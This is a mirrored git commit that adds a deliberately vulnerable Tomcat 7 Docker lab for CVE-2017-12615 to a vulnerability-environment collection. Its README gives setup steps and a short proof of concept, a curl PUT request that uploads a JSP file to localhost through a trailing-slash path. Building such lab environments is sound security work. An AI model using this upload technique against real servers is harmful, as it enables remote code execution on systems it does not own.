mirror of
https://github.com/Medicean/VulApps.git
synced 2025-06-21 10:20:20 +00:00
(Add Vul: Tomcat) Tomcat 远程代码执行漏洞 (CVE-2017-12615)
This commit is contained in:
parent
0f217f72ee
commit
a24343e39b
@ -48,6 +48,7 @@ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037
|
|||||||
* [P](#p)
|
* [P](#p)
|
||||||
* [R](#r)
|
* [R](#r)
|
||||||
* [S](#s)
|
* [S](#s)
|
||||||
|
* [T](#t)
|
||||||
* [W](#w)
|
* [W](#w)
|
||||||
* [Z](#z)
|
* [Z](#z)
|
||||||
|
|
||||||
@ -118,6 +119,10 @@ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037
|
|||||||
* [Spring WebFlow](./s/springwebflow/)
|
* [Spring WebFlow](./s/springwebflow/)
|
||||||
* [Supervisor](./s/supervisor/)
|
* [Supervisor](./s/supervisor/)
|
||||||
|
|
||||||
|
### [T](./t/)<div id="t"></div>
|
||||||
|
|
||||||
|
* [Tomcat](./t/tomcat/)
|
||||||
|
|
||||||
### [W](./w/)<div id="w"></div>
|
### [W](./w/)<div id="w"></div>
|
||||||
|
|
||||||
* [WordPress](./w/wordpress/)
|
* [WordPress](./w/wordpress/)
|
||||||
|
3
t/README.md
Normal file
3
t/README.md
Normal file
@ -0,0 +1,3 @@
|
|||||||
|
# T
|
||||||
|
|
||||||
|
* [Tomcat](./tomcat/)
|
3
t/tomcat/1/Dockerfile
Normal file
3
t/tomcat/1/Dockerfile
Normal file
@ -0,0 +1,3 @@
|
|||||||
|
FROM tomcat:7.0.79-jre8
|
||||||
|
COPY src/web.xml /usr/local/tomcat/conf/web.xml
|
||||||
|
EXPOSE 8080
|
44
t/tomcat/1/README.md
Normal file
44
t/tomcat/1/README.md
Normal file
@ -0,0 +1,44 @@
|
|||||||
|
## Tomcat 远程代码执行漏洞 (CVE-2017-12615)
|
||||||
|
|
||||||
|
### 漏洞信息
|
||||||
|
|
||||||
|
* [Fixed in Apache Tomcat 7.0.81](http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.81)
|
||||||
|
* [Tomcat代码执行漏洞分析测试(附POC)](https://mp.weixin.qq.com/s/dgWT3Cgf1mQs-IYxeID_Mw)
|
||||||
|
|
||||||
|
> 根据测试发现 7.0.81 并未修复完全,可绕过,具体参考下方paper链接
|
||||||
|
|
||||||
|
* [云鼎实验室:Tomcat 远程代码执行漏洞分析(CVE-2017-12615)及补丁 Bypass](https://paper.seebug.org/398/)
|
||||||
|
|
||||||
|
### 获取环境:
|
||||||
|
|
||||||
|
1. 拉取镜像到本地
|
||||||
|
|
||||||
|
```
|
||||||
|
$ docker pull medicean/vulapps:t_tomcat_1
|
||||||
|
```
|
||||||
|
|
||||||
|
2. 启动环境
|
||||||
|
|
||||||
|
```
|
||||||
|
$ docker run -d -p 8080:8080 medicean/vulapps:t_tomcat_1
|
||||||
|
```
|
||||||
|
> `-p 8080:8080` 前面的 8080 代表物理机的端口,可随意指定。
|
||||||
|
|
||||||
|
### 使用与利用
|
||||||
|
|
||||||
|
访问 `http://你的 IP 地址:端口号/`
|
||||||
|
|
||||||
|
#### PoC
|
||||||
|
|
||||||
|
1. 向目标发起 PUT 请求,注意后缀为 `.jsp/`
|
||||||
|
|
||||||
|
```
|
||||||
|
$ curl -X PUT "http://127.0.0.1:8080/123.jsp/" -d '<%out.println("test");%>'
|
||||||
|
```
|
||||||
|
|
||||||
|
2. 然后访问目标地址 `http://127.0.0.1:8080/123.jsp`, 即可看到输出了 `test`
|
||||||
|
|
||||||
|
|
||||||
|
### 参考链接
|
||||||
|
|
||||||
|
* [Tomcat代码执行漏洞分析测试(附POC)](https://mp.weixin.qq.com/s/dgWT3Cgf1mQs-IYxeID_Mw)
|
4683
t/tomcat/1/src/web.xml
Normal file
4683
t/tomcat/1/src/web.xml
Normal file
File diff suppressed because it is too large
Load Diff
4
t/tomcat/README.md
Normal file
4
t/tomcat/README.md
Normal file
@ -0,0 +1,4 @@
|
|||||||
|
Tomcat
|
||||||
|
---
|
||||||
|
|
||||||
|
* [Tomcat 远程代码执行漏洞 (CVE-2017-12615)](./1/)
|
Loading…
x
Reference in New Issue
Block a user